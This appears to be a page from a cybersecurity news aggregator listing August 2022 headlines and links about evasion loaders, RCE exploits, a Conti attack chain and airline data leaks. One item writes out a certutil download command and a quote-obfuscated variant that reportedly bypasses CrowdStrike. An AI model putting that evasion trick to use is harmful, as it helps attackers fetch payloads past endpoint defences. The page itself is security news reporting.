cyber – Page 258 – Cyber Security News Aggregator

August 14, 2022 at 10:22AM

August 14, 2022cK-botUncategorized

■■■■□ Tool AceLdr – Avoid Memory Scanners: A position-independent reflective loader for Cobalt Strike. Zero results from Hunt-Sleeping-Beacons, BeaconHunter, BeaconEye, Patriot, Moneta, PE-sieve, or MalMemDetect. https://github.com/kyleavery/AceLdr https://t.me/cKure/11703

August 12, 2022 at 09:04PM

August 12, 2022cK-botUncategorized

■■■■□ Visual Studio Code – Remote Code Execution in Restricted Mode (CVE-2021-43908). https://blog.electrovolt.io/posts/vscode-rce/ https://t.me/cKure/11702

August 11, 2022 at 01:43PM

August 11, 2022cK-botUncategorized

■■■■■ Chromium site isolation bypass allows wide range of attacks on browsers. https://portswigger.net/daily-swig/amp/chromium-site-isolation-bypass-allows-wide-range-of-attacks-on-browsers https://t.me/cKure/11701

August 11, 2022 at 01:01PM

August 11, 2022cK-botUncategorized

■■■■■ Conti Group attack Exchange -> Anydesk -> CobatStrike -> rclone -> mega othdripinid1979@protonmail.com 37.252.11.18 https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g https://t.me/cKure/11700

August 11, 2022 at 12:01AM

August 10, 2022cK-botUncategorized

■■■■■ This is a pre-authenticated RCE exploit for VMware vRealize Operations Manager. https://github.com/sourceincite/DashOverride https://t.me/cKure/11698

August 10, 2022 at 04:22PM

August 10, 2022cK-botUncategorized

■■□□□ Discovering Domains via a Timing Attack on Certificate Transparency. https://swarm.ptsecurity.com/discovering-domains-via-timing-attack/ https://t.me/cKure/11697

August 10, 2022 at 02:52PM

August 10, 2022cK-botUncategorized

■■■■□ CrowdStrike can be bypassed for executing commands using some techniques. One of them is: Blocked –> certutil -urlcache -split -f http:// Bypassed –> certutil -url””cache -sp””lit -“”f http:// https://twitter.com/_M_Shahnawaz/status/1557240421595619329 https://t.me/cKure/11695

August 10, 2022 at 01:11PM

August 10, 2022cK-botUncategorized

■■■□□ For the airline passengers in Malaysia, the amount of stolen data included in the file has about 12 million rows. On the other hand, the compromised data of UAE-based airline passengers have about four million rows. https://izoologic.com/2022/08/09/data-of-malaysian-and-uae-airline-passengers-for-sale-online/ https://t.me/cKure/11694

August 10, 2022 at 01:04PM

August 10, 2022cK-botUncategorized

■■■■□ Data-Leak from Malaysia and UAE as compromised databases of the Malaysian and UAE airline passengers are offered for $1,000 each online. https://t.me/cKure/11693

August 10, 2022 at 01:00PM

August 10, 2022cK-botUncategorized

■■■□□ Unconfirmed: Data-Leak from Malaysia as actor ‘Bill_Joy’ claims to have data of Malaysian Airlines. https://t.me/cKure/11692